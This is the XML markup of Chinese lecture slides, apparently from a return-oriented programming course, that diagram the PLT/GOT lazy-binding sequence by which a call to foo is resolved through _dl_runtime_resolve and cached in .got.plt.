                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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16" name="Shape 916"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="2033033"/>
            <a:ext cx="2248400" cy="13960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push *(GOT+4)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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17" name="Shape 917"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="1564600"/>
            <a:ext cx="1180400" cy="5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.text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918" name="Shape 918"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="1180400" cy="5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foo@plt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919" name="Shape 919"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="1564600"/>
            <a:ext cx="1180400" cy="5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PLT0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920" name="Shape 920"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5439300"/>
            <a:ext cx="2095200" cy="4096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...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921" name="Shape 921"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>
            <a:ext cx="1180400" cy="5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.got.plt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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="922" name="Shape 922"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="923" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032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5" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52BC0DDB-ECF4-441A-A8DB-D8BD7B1E0CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="40799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回到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plt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是为了解析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foo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的实际地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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A11C1FDF-459D-4272-B9C8-1F81E9B68EDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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Shape 929"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400" y="2033033"/>
            <a:ext cx="2248400" cy="13960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endParaRPr sz="1867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endParaRPr sz="1867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call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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30" name="Shape 930"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4210500"/>
            <a:ext cx="2095200" cy="4096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printf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931" name="Shape 931"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="2095200" cy="4096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foo@plt+6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932" name="Shape 932"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5029700"/>
            <a:ext cx="2095200" cy="4096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bar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933" name="Shape 933"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="2033033"/>
            <a:ext cx="2248400" cy="13960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jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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34" name="Shape 934"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="2033033"/>
            <a:ext cx="2248400" cy="13960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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push *(GOT+4)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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35" name="Shape 935"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="1564600"/>
            <a:ext cx="1180400" cy="5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.text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936" name="Shape 936"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="1180400" cy="5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foo@plt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937" name="Shape 937"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="1564600"/>
            <a:ext cx="1180400" cy="5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PLT0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938" name="Shape 938"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5439300"/>
            <a:ext cx="2095200" cy="4096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...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939" name="Shape 939"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>
            <a:ext cx="1180400" cy="5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.got.plt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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="940" name="Shape 940"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="941" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032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5" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10DBFBC0-7C17-405F-8CE1-4F8E618FA438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="375461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跳转到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plt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头部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__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dl_runtime_resolve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函数传参</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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4B22BB0E-D4A6-4F57-B09D-D6F516EB7048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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Shape 948"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400" y="2033033"/>
            <a:ext cx="2248400" cy="13960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endParaRPr sz="1867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endParaRPr sz="1867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call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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49" name="Shape 949"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4210500"/>
            <a:ext cx="2095200" cy="4096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printf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950" name="Shape 950"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="2095200" cy="4096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foo@plt+6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951" name="Shape 951"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5029700"/>
            <a:ext cx="2095200" cy="4096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bar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952" name="Shape 952"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="2033033"/>
            <a:ext cx="2248400" cy="13960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jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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53" name="Shape 953"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="2033033"/>
            <a:ext cx="2248400" cy="13960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push *(GOT+4)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="999999"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="999999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54" name="Shape 954"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="1564600"/>
            <a:ext cx="1180400" cy="5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.text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955" name="Shape 955"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="1180400" cy="5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foo@plt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956" name="Shape 956"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="1564600"/>
            <a:ext cx="1180400" cy="5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PLT0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957" name="Shape 957"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5439300"/>
            <a:ext cx="2095200" cy="4096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...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958" name="Shape 958"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>
            <a:ext cx="1180400" cy="5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.got.plt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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="959" name="Shape 959"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="960" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032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5" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C5040D4-9F54-4527-BBEC-B7656F64A15D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="375461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跳转到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plt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头部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__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dl_runtime_resolve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函数传参</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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41AC477A-0898-4657-AC9D-3B230167A3C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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Shape 967"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400" y="2033033"/>
            <a:ext cx="2248400" cy="13960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endParaRPr sz="1867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endParaRPr sz="1867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call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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68" name="Shape 968"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4210500"/>
            <a:ext cx="2095200" cy="4096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printf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969" name="Shape 969"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="2095200" cy="4096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foo@plt+6</a:t>
            </a:r>
            <a:endParaRPr sz="1867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970" name="Shape 970"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5029700"/>
            <a:ext cx="2095200" cy="4096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bar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971" name="Shape 971"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="2033033"/>
            <a:ext cx="2248400" cy="13960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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>call _fix_up</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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ret 0xc</a:t>
            </a:r>
            <a:endParaRPr sz="1867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72" name="Shape 972"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="1564600"/>
            <a:ext cx="1180400" cy="5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.text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973" name="Shape 973"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="1720800" cy="5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"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dl_resolve</a:t>
            </a:r>
            <a:endParaRPr sz="1867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974" name="Shape 974"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5439300"/>
            <a:ext cx="2095200" cy="4096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...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975" name="Shape 975"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>
            <a:ext cx="1180400" cy="5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.got.plt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9E312383-95D4-4D97-B4D3-4AAE3740E8C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="512198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__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dl_runtime_resolve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函数解析 </a:t>
            </a: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foo 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的真正地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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填入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got.plt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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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F405480B-D0E5-47AE-B0FA-89E6DDE05470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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Shape 982"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400" y="2033033"/>
            <a:ext cx="2248400" cy="13960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endParaRPr sz="1867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endParaRPr sz="1867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call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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83" name="Shape 983"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4210500"/>
            <a:ext cx="2095200" cy="4096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printf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984" name="Shape 984"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="2095200" cy="4096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foo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985" name="Shape 985"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5029700"/>
            <a:ext cx="2095200" cy="4096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bar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986" name="Shape 986"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="2033033"/>
            <a:ext cx="2248400" cy="13960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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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call _fix_up</a:t>
            </a:r>
            <a:endParaRPr sz="1867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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret 0xc</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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87" name="Shape 987"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="1564600"/>
            <a:ext cx="1180400" cy="5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.text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988" name="Shape 988"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="1720800" cy="5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dl_resolve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989" name="Shape 989"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5439300"/>
            <a:ext cx="2095200" cy="4096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...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990" name="Shape 990"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>
            <a:ext cx="1180400" cy="5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.got.plt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5119F5D-D863-43DA-84B1-185CF9064524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="43941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此后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got.plt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中保存的是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foo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的真实地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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1795C130-E5EC-42BF-9F84-EE1C6E1ABDA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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Shape 997"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400" y="2033033"/>
            <a:ext cx="2248400" cy="13960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endParaRPr sz="1867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endParaRPr sz="1867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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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98" name="Shape 998"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4210500"/>
            <a:ext cx="2095200" cy="4096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printf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999" name="Shape 999"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="2095200" cy="4096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foo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000" name="Shape 1000"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5029700"/>
            <a:ext cx="2095200" cy="4096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bar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001" name="Shape 1001"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="2033033"/>
            <a:ext cx="2248400" cy="13960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jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867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jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867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002" name="Shape 1002"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="2033033"/>
            <a:ext cx="2248400" cy="13960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push *(GOT+4)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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003" name="Shape 1003"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="1564600"/>
            <a:ext cx="1180400" cy="5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.text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004" name="Shape 1004"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="1180400" cy="5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foo@plt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005" name="Shape 1005"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="1564600"/>
            <a:ext cx="1180400" cy="5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PLT0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006" name="Shape 1006"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5439300"/>
            <a:ext cx="2095200" cy="4096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...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007" name="Shape 1007"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>
            <a:ext cx="1180400" cy="5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.got.plt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4C92709A-9564-4B8A-BDA3-B65E1FD937C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="22284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进程第二次调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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57211A77-E38D-492B-8A1A-EF4BDA9F558B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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Shape 1014"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400" y="2033033"/>
            <a:ext cx="2248400" cy="13960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endParaRPr sz="1867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endParaRPr sz="1867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call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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015" name="Shape 1015"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4210500"/>
            <a:ext cx="2095200" cy="4096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printf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016" name="Shape 1016"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="2095200" cy="4096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foo</a:t>
            </a:r>
            <a:endParaRPr sz="1867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017" name="Shape 1017"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5029700"/>
            <a:ext cx="2095200" cy="4096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bar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018" name="Shape 1018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="2033033"/>
            <a:ext cx="2248400" cy="13960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b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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019" name="Shape 1019"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="2033033"/>
            <a:ext cx="2248400" cy="13960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push *(GOT+4)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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020" name="Shape 1020"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
